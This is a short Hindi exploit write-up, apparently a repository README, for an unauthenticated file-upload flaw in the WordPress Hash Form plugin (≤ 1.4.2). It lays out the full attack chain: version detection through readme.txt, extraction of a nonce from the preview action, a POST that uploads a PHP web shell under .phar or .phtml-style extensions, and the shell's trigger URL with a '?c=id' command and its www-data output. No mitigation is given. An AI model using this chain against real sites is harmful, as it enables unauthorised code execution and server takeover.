
CVE-2026-81780 के लिए एक्सप्लॉइट: WordPress Hash Form प्लगइन में अनप्रमाणित फ़ाइल अपलोड, जो क्राफ्टेड PHP पेलोड के माध्यम से रिमोट कोड एक्ज़ीक्यूशन की ओर ले जाता है।
CVE-2026-81780 — हैश फॉर्म RCE
भेद्यता
WordPress हैश फॉर्म प्लगइन (≤ 1.4.2) में बिना प्रमाणीकरण के फ़ाइल अपलोड। प्लगइन उचित प्रमाणीकरण या फ़ाइल प्रकार सत्यापन के बिना मनमानी फ़ाइल अपलोड की अनुमति देता है, जिससे रिमोट कोड निष्पादन (RCE) होता है।
शोषण श्रृंखला
चरण क्रिया 1 हमलावर readme.txt के माध्यम से हैश फॉर्म प्लगइन की जाँच करता है 2 फ़ॉर्म पूर्वावलोकन (hashform_preview) द्वारा ajax_nounce निकालता है 3 PHP पेलोड के साथ hashform_file_upload_action पर POST अनुरोध भेजता है 4 वेब शेल को .phar, .phtml, .php5, या .php7 के रूप में अपलोड करता है 5 /wp-content/uploads/hashform/temp/v.{ext} तक पहुँच कर शेल ट्रिगर करता है 6 ?c=id के माध्यम से सिस्टम कमांड निष्पादित करता है
GET /wp-content/plugins/hash-form/readme.txt
↓
Version Detected (≤ 1.4.2)
↓
GET /wp-admin/admin-ajax.php?action=hashform_preview&form=1
↓
Extract Nonce: ajax_nounce=...
↓
POST /wp-admin/admin-ajax.php?action=hashform_file_upload_action
↓
Upload: v.phar (or .phtml, .php5, .php7)
↓
GET /wp-content/uploads/hashform/temp/v.phar?c=id
↓
Command Executed (uid=www-data)```